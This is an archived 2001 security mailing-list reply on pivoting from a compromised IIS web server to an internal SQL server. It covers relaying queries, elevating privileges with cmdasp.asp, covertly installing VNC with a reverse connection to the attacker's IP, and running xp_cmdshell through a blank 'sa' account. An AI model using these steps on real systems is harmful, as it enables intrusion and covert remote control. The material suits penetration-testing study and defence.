-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 There are a few ways to go about this: 1. Upload a tool to the IIS box which runs a SQL query against the database server. You could try sqlexec.exe (packetstorm) or even create an ASP script on the server which relays a request to the database server. If the /msadc RDS component is available you can try using my sqlrds.pl tool to relay a request to the server through that. The sqlrds.pl script is available from http://www.digitaloffense.net/csw/ 2. Get a GUI interface on the IIS server. Install VNC on the IIS server after elevating your access with hk.exe or cmdasp.asp. You can run the VNC server in outbound mode and run the client in listen mode, so that should get you through the firewall. To install VNC remotely: a. Install VNC on a local machine, set a password and any options. b. Open RegEdit, export the HKLM/Software/ORL key to a file. c. Copy winvnc.exe, vnchooks.dll, and omnithread_rt.dll to the target's \winnt\system32 directory d. Copy your exported registry file to the target, import with regedit <filename>.reg e. Execute winvnc -install on the target system d. Execute net start winvnc f. Execute vncviewer -listen on the attacking system g. Execute winvnc -connect <your ip> and enjoy your desktop ;) 3. Owning the SQL server. With a blank "sa" account, this should be trivial. Just execute the xp_cmdshell stored procedure and follow the above steps to get a VNC desktop. For more info, check out my CanSecWest/core01 presentation, available online at http://www.digitaloffense.net/csw/ or read the excellent material available from http://www.sqlsecurity.com/ - -HD Senior Security Analyst Digital Defense Incorporated http://www.digitaldefense.net/ On Wednesday 11 April 2001 10:52 pm, myrddin_eat_private wrote: > Once I have done this, the only traffic into the internal network allowed > from the IIS server will be on port 1433. The SQL server will have a blank > 'sa' password. How would I then proceed to bust the SQL server? I know I > can do this if I install Perl on the IIS server and place the needed tools > on the box, but that requires GUI access to the IIS server (right?). Other > than setting up a port redirector like FPipe, how would you go about this? > > Free, encrypted, secure Web-based email at www.hushmail.com -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQA/AwUBOtZ4WTwRvqMPEDLhEQImKgCfSCpzTLunnAc0jF9GhrkRCbwHJ9gAoIsH Fy1y25z9JgJ7LvpLbLi6VrAu =gcga -----END PGP SIGNATURE-----
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 09:18:06 PDT